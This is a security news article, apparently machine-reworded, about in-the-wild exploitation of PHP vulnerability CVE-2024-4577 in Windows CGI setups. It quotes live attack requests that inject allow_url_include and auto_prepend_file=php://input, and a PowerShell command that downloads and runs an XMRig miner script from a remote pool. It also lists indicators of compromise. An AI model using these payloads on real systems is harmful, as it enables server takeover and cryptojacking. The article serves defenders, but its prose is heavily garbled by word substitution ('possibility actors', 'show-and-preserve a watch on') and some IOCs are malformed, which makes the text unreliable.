Critical PHP Vulnerability CVE-2024-4577 Actively Exploited in the Wild

by Esmeralda McKenzie
Critical PHP Vulnerability CVE-2024-4577 Actively Exploited in the Wild

Critical PHP Vulnerability CVE-2024-4577 Actively Exploited in the Wild

Extreme PHP Vulnerability CVE-2024-4577 Actively Exploited within the Wild

A essential vulnerability in PHP, tracked as CVE-2024-4577, is being actively exploited by possibility actors in wild genuine days after its public disclosure in June 2024. The flaw impacts PHP installations working in CGI mode, totally on Windows programs the use of Chinese language and Jap language locales, even though it can presumably presumably per chance impression a wider range of setups.

The Akamai Security Intelligence Response Crew (SIRT) has detected various exploit makes an attempt concentrated on this vulnerability within 24 hours of its disclosure. The convenience of exploitation has resulted in mercurial adoption by various possibility actors.

EHA

“With out a doubt one of many elements in figuring out criticality is the ease of exploitation, and this one in all fairness uncomplicated for a possibility actor to invent. To enact RCE, an attacker genuine desires to ship PHP code to the server and possess or no longer or no longer it’s (mis)interpreted.” Akamai said.

Malware Campaigns Leveraging the Flaw

Akamai researchers possess seen the flaw being abused in a couple of malware campaigns, alongside side:

  • Gh0st RAT: A 15-365 days-feeble remote access software program became dilapidated in attacks originating from a server in Germany. The malware renamed itself and beaconed out to a show-and-preserve a watch on server.
  • RedTail Cryptominer: A cryptomining operation became detected abusing the vulnerability to retrieve and invent a shell script that downloads an x86 RedTail cryptomining malware.
  • Muhstik Malware: One more marketing campaign downloaded a variant of Muhstik malware, which targets IoT devices and Linux servers for cryptomining and DDoS purposes.
  • XMRig: PowerShell became dilapidated to gather and invent a script that spins up the XMRig cryptominer from a remote mining pool.

Interior 24 hours of disclosure, SIRT seen Gh0st RAT malware makes an attempt concentrated on this vulnerability. The malware, a UPX-packed Windows executable, beacons out to a Germany-essentially essentially based show and preserve a watch on server and renames itself to evade detection.

RedTail Cryptominer

SIRT honeypots detected a RedTail cryptomining operation exploiting CVE-2024-4577. The attacker dilapidated a shell script to gather and invent the cryptomining malware from a Russia-essentially essentially based IP take care of.

Content-Type: application/x-www-form-urlencoded  User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0    URI: /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input  POST DATA:  

Muhstik Malware

One more marketing campaign alive to a shell script downloading Muhstik malware, which targets Net of Things and Linux servers for cryptomining and dispensed denial-of-service (DDoS) attacks.

User-Agent: python-requests/2.22  URI: /?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input  POST DATA: ;echo 1337; die;

XMRig

A fourth marketing campaign alive to XMRig, where PowerShell instructions had been dilapidated to gather and invent a script to stir up the cryptominer from a remote mining pool.

URI: /test.hello?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input  POST DATA (Base64 Encoded):    POST DATA (Base64 Decoded): powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 49w8gsLw7UwUVszUBtYujdN1McNkoeYucTctaePX8nmbjKABzJ9S1rigWdh5EiUT1z4NPAPchxT7RaJXN3fURUpM6F6KGjy; Remove-Item -Force $tempfile"

Akamai advises affected organizations to patch their programs and notice for indicators of compromise (IOCs).

Those the use of e book mode would possibly presumably presumably per chance smooth make certain the Tell Injection Assault personnel or issue linked suggestions are house to “Bid” mode. Akamai has seen a surge in scanning for this vulnerability and is persevering with to notice the explain closely.

Indicators of compromise for SOC/DFIR Teams

Gh0st RAT

SHA256 hash

A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e

File names

  • A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e.exe
  • phps.exe
  • Iqgqosc.exe

IPv4 addresses

  • 147.50.253[.]109
  • 146.19.100[.]7
  • 23.237.182[.]122

BangCloud linked IOCs with hits on VirusTotal

  • 147.50.253[.]220
  • 147.50.253[.]222
  • 147.50.253[.]225
  • 147.50.253[.]219
  • 147.50.253[.]231
  • 147.50.253[.]ninety nine
  • 147.50.253[.]100
  • 147.50.253[.]228
  • 147.50.253[.]5
  • 147.50.253[.]4
  • 154.197.12[.].156
  • 147.50.253[.]110
  • 147.50.253[.]102
  • 147.50.253[.]218
  • 147.50.253[.]23
  • 147.50.253[.]11
  • 147.50.253[.]163
  • 147.50.253[.]2
  • 147.50.253[.]116
  • 147.50.253[.]18
  • 147.50.253[.]109
  • 147.50.253[.]106
  • 147.50.253[.]112
  • 147.50.253[.]111
  • 147.50.253[.]7
  • 147.50.253[.]104
  • 147.50.253[.]167
  • 147.50.253[.]119
  • 147.50.253[.]113
  • 147.50.253[.]103
  • 147.50.253[.]107
  • 147.50.253[.]105
  • 147.50.253[.]114
  • 147.50.253[.]108
  • 147.50.253[.]101
  • 147.50.253[.]117
  • 147.50.253[.]115
  • 147.50.229[.]12

MITRE ATT&CK tactics

  • T1091 — Replication By Removable Media
  • T1547 — Boot or Logon Autostart Execution
  • T1056 — Input Capture
  • T1112 — Regulate Registry
  • T1003 — OS Credential Dumping
  • T1120 — Peripheral System Discovery
  • T1027 — Obfuscated Recordsdata or Recordsdata
  • T1071 — Utility Layer Protocol
  • T1082 — System Recordsdata Discovery
  • T1571 — Non-Odd Port
  • T1057 — Course of Discovery

RedTail

IPv4 addresses

185.172.128[.]93

SHA256 hashes

  • 2c602147c727621c5e98525466b8ea78832abe2c3de10f0b33ce9a4adea205eb
  • 0d70a044732a77957eaaf28d9574d75da54ae430d8ad2e4049bd182e13967a6f
  • ab897157fdef11b267e986ef286fd44a699e3699a458d90994e020619653d2cd
  • 9753df3ea4b9948c82310f64ff103685f78af85e3e08bb5f0d0d44047c63c315
  • 19a06de9a8b66196fa6cc9e86824dee577e462cbeaf36d715c8fea5bcb08b54d

Source credit : cybersecuritynews.com